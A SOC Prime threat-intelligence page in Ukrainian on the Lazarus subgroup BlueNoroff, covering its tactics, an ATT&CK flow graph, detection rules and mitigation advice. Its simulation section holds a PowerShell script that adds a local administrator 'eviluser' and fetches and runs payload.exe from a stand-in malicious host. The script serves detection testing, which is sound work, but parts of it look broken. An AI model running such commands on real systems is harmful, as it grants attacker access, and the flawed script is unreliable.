SOC Prime Bias: Критичний

21 Jan 2026 18:58
newspaper icon picussecurity.com

Група BlueNoroff: Фінансовий кіберзлочинний підрозділ Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Група BlueNoroff: Фінансовий кіберзлочинний підрозділ Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

BlueNoroff — це фінансово вмотивована підгрупа в екосистемі Lazarus, яка зосереджується на операціях з високою цінністю проти банків, криптовалютних фірм і ширших цілей Web3. Книга гри групи охоплює шахрайство з використанням SWIFT, компрометацію водопоїв, отруєння постачальницького ланцюжка пакетів Go і шляхи вторгнення в macOS, що базуються на фейкових приманках “співбесіда на роботу”. Для досягнення виконання і заводу BlueNoroff змішує модульний стек шкідливих програм Rust/Go з AppleScript, VBScript і соціально-інженерськими робочими процесами, розробленими для обходу обережності користувачів та інтеграції в легітимну діяльність розробки та адміністрування.

Розслідування

Звіт відстежує траєкторію BlueNoroff від пограбування банку в Бангладеш у 2016 році до більш недавніх активностей у постачальницькому ланцюзі 2025 року, підкреслюючи, як інструменти та цілі актора розширювалися разом з екосистемою криптовалют/Web3. Дослідники окреслюють інфраструктурні шаблони та каталогізують компоненти шкідливих програм, включаючи GhostCall, GhostHire, RustBucket і GillyInjector. Розслідування також картиє спостережувані поведінки на MITRE ATT&CK через такі стадії, як розвідка та початковий доступ, а потім виконання, заповзятість і викрадення облікових даних, підкреслюючи постійний акцент на скритних опорах, поетапній доставці корисного навантаження та шляхах доступу, готових до крадіжки.

Пом’якшення

Зменшіть вплив, посиливши гігієну постачальницького ланцюга: перевіряйте пакунки, отримані з публічних реєстрів, впроваджуйте контроль прив’язки і походження, і постійно переглядайте оновлення залежностей на несподівані зміни в підтримувачі або коді. На macOS підсилити управління LaunchAgent/LaunchDaemon та стежте за підозрілими записами стійкості та непідписаними інструментами. Блокуйте домени, схожі на приманку, впроваджуйте MFA для привілейованих особистостей та зовнішніх сервісів, і операціоналізуйте виявлення відомих шкідливих скриптів, завантажувачів і технік запаковки, пов’язаних з актором. Підтримуйте часті оновлення розвідки загроз і зміцнюйте навчання користувачів, зосереджене на фішингу і соціально-інженерних шаблонах “рекрутер/співбесіда на роботу”.

Реакція

Якщо виявлено індикатори BlueNoroff, ізолюйте уражені хости та збережіть ключові докази, включаючи повні командні рядки, вміст скриптів і спущені бінарні файли або артефакти пакунків. Блокуйте виявлені шкідливі домени та C2 IPs, тоді виконайте сценарії реагування на інциденти, пов’язані з викраденням облікових даних і компрометацією постачальницького ланцюга. Розгорніть чи налаштуйте виявлення для ланцюжків виконання AppleScript і VBScript, а також для підозрілих шаблонів PowerShell, зазначених у звітах, тоді розширте полювання, щоб визначити додаткові кінцеві точки, вплив яких був викликаний тією ж приманкою, залежністю або перекриттям інфраструктури.

“graph TB %% Опис класів classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Вузли технік gather_identity[“<b>Техніка</b> – <b>T1589 Збір інформації про особу жертви</b><br />Збирає особисту, професійну та онлайн інформацію про ціль.”] class gather_identity technique search_social[“<b>Техніка</b> – <b>T1593.001 Пошук у соціальних мережах</b><br />Запити до облікових записів у соціальних мережах, що належать жертві, для пошуку корисних даних.”] class search_social technique phish_info[“<b>Техніка</b> – <b>T1598.001 Фішинг інформації</b><br />Створює повідомлення, щоб обдурити жертв для розкриття облікових даних або інших даних.”] class phish_info technique spearphish_service[“<b>Техніка</b> – <b>T1566.003 Сперфішинг через сервіс</b><br />Використовує легітимний онлайн-сервіс для доставки шкідливого контенту жертві.”] class spearphish_service technique launch_agent[“<b>Техніка</b> – <b>T1543.001 Запуск агента</b><br />Встановлює агент запуску macOS для досягнення стійкості.”] class launch_agent technique launch_daemon[“<b>Техніка</b> – <b>T1543.004 Запуск демона</b><br />Встановлює демон запуску macOS для досягнення стійкості.”] class launch_daemon technique tcc_manip[“<b>Техніка</b> – <b>T1548.006 Маніпуляція TCC</b><br />Змінює налаштування Прозорості, Згоди та Контролю для отримання вищих привілеїв.”] class tcc_manip technique software_packing[“<b>Техніка</b> – <b>T1027.002 Пакування програмного забезпечення</b><br />Стискає або шифрує корисне навантаження, щоб ухилитися від аналізу.”] class software_packing technique masquerading[“<b>Техніка</b> – <b>T1036.005 Маскування</b><br />Перейменовує файли або використовує знайомі значки, щоб виглядати легітимним.”] class masquerading technique gui_input[“<b>Техніка</b> – <b>T1056.002 Захоплення вводу GUI</b><br />Записує клавіатурний ввод або дії миші з графічних інтерфейсів, щоб вкрасти облікові дані.”] class gui_input technique system_info[“<b>Техніка</b> – <b>T1082 Виявлення системної інформації</b><br />Збирає версію ОС, інформацію про апаратне забезпечення та встановлене програмне забезпечення.”] class system_info technique data_local[“<b>Техніка</b> – <b>T1005 Дані з локальної системи</b><br />Копіює файли інтересу з інфікованого хоста.”] class data_local technique local_staging[“<b>Техніка</b> – <b>T1074.001 Локальне накопичення даних</b><br />Розміщує зібрані дані в каталозі для подальшої ексфільтрації.”] class local_staging technique web_protocols[“<b>Техніка</b> – <b>T1071.001 Веб-протоколи</b><br />Використовує HTTP/HTTPS для трафіку команд і управління.”] class web_protocols technique dead_drop[“<b>Техніка</b> – <b>T1102.001 Dead Drop Resolver</b><br />Отримує інструкції з публічних місць розміщення.”] class dead_drop technique bidirectional[“<b>Техніка</b> – <b>T1102.002 Двосторонній C2</b><br />Дозволяє двосторонній зв’язок між атакувачем і зловмисним ПЗ.”] class bidirectional technique oneway[“<b>Техніка</b> – <b>T1102.003 Односторонній C2</b><br />Лише отримує команди від атакувача без відправки даних назад.”] class oneway technique %% Вузли дій user_click[“<b>Дія</b> – Користувач натискає на шкідливе посилання і завантажує корисне навантаження”] class user_click action %% Вузол операторів (опціональне І для режимів стійкості) op_persistence((“І”)) class op_persistence operator %% Зв’язки gather_identity u002du002d>|призводить до| search_social search_social u002du002d>|призводить до| phish_info phish_info u002du002d>|призводить до| spearphish_service spearphish_service u002du002d>|тригерить| user_click user_click u002du002d>|встановлює| op_persistence op_persistence u002du002d>|використовує| launch_agent op_persistence u002du002d>|використовує| launch_daemon launch_agent u002du002d>|полегшує| tcc_manip launch_daemon u002du002d>|полегшує| tcc_manip tcc_manip u002du002d>|полегшує| software_packing tcc_manip u002du002d>|полегшує| masquerading software_packing u002du002d>|сприяє| gui_input masquerading u002du002d>|сприяє| gui_input gui_input u002du002d>|надає| system_info system_info u002du002d>|підтримує| data_local data_local u002du002d>|готує| local_staging local_staging u002du002d>|ексфільтрує через| web_protocols web_protocols u002du002d>|підтримує| dead_drop dead_drop u002du002d>|підтримує| bidirectional bidirectional u002du002d>|підтримує| oneway “

Атака Flow

Виявлення

Можливе виявлення конфігурації мережі системи (через cmdline)

Команда SOC Prime
21 січня 2026 року

Переглянути

Можливе виявлення віддаленої системи або перевірка підключення (через cmdline)

Команда SOC Prime
21 січня 2026 року

Переглянути

Підозрілі бінарні файли / скрипти в локації автозапуску (через file_event)

Команда SOC Prime
21 січня 2026 року

Переглянути

Можливе перерахування адміністраторських акаунтів або груп (через cmdline)

Команда SOC Prime
21 січня 2026 року

Переглянути

IOCs (Електронні листи) для виявлення: група BlueNoroff: фінансове кіберзлочинне крило Lazarus

Правила AI SOC Prime
21 січня 2026 року

Переглянути

Виявлення шкідливого виконання AppleScript і команди ClickFix [Створення процесу Windows]

Правила AI SOC Prime
21 січня 2026 року

Переглянути

Перелік локальних і доменних користувачів через Net-команди [Windows Sysmon]

Правила AI SOC Prime
21 січня 2026 року

Переглянути

Виявлення обфускації та кодування BlueNoroff PowerShell [Windows PowerShell]

Правила AI SOC Prime
21 січня 2026 року

Переглянути

Виконання симуляції

Передумова: передпольотна перевірка телеметрії та базових умов має бути пройдена.

Мотив: у цьому розділі детально описано точне виконання техніки супротивника (TTP), призначене для активації правила виявлення. Команди і наратив повинні безпосередньо відображати визначені TTPs та спрямовані на створення тієї самої телеметрії, що очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.

  • Опис атаки та команди:

    1. Виконання AppleScript (T1546.016) – Противник скидає шкідливий payload.scpt на кінцеву точку (наприклад, через фішингове вкладення). Використовуючи попередньо встановлений osascript.exe (упакований з інструментом третьої сторони), вони запускають скрипт для виконання завантажувача PowerShell, що додає новий локальний обліковий запис адміністратора.
    2. Доставлення ClickFix через буфер обміну (T1204.004) – Атакуючий копіює створену команду у буфер обміну, що викликає curl з користувацьким агентом в стилі Zoom для завантаження другого етапу корисного навантаження, а потім негайно виконує його через cmd.exe. Команда включає також вбудований powershell.exe -c виклик для виконання корисного навантаження в пам’яті.

  • Сценарій регресійного тестування: Сценарій нижче відтворює обидві поведінки в детермінований спосіб.

    #----- ПОЧАТОК СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ -----
# Переконайтеся, що ми працюємо з адміністративними привілеями
if (-not ([Security.Principal.WindowsPrincipal] `
    [Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Error "Запустіть цей скрипт як Адміністратор."
    exit 1
}

# 1. Виконання AppleScript через osascript.exe
$appleScriptPath = "$env:TEMPmalicious.scpt"
Set-Content -Path $appleScriptPath -Value @"
tell application "System Events"
    do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
end tell
"@
# Виконання AppleScript
Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait

# 2. Доставлення стилю ClickFix через буфер обміну
$clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
# Запуск через cmd.exe відповідно до умов правила
Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait

# Очистити: видалити артефакти
Remove-Item -Path $appleScriptPath -Force
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
# Кінець скрипту
#----- КІНЕЦЬ СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ -----

  • Команди очищення: Видаліть всі залишкові процеси, файли та обліковий запис тестування користувача.

    # Зупинити всі залишкові процеси (оборонна дія – зазвичай не потрібна)
Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force

# Видалити тимчасові файли
Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Видалити тестовий обліковий запис адміністратора, якщо він був створений
if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
    Remove-LocalUser -Name "eviluser"
}

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам почати і забезпечити негайну користь, заплануйте зустріч з експертами SOC Prime.

Приєднатися безкоштовно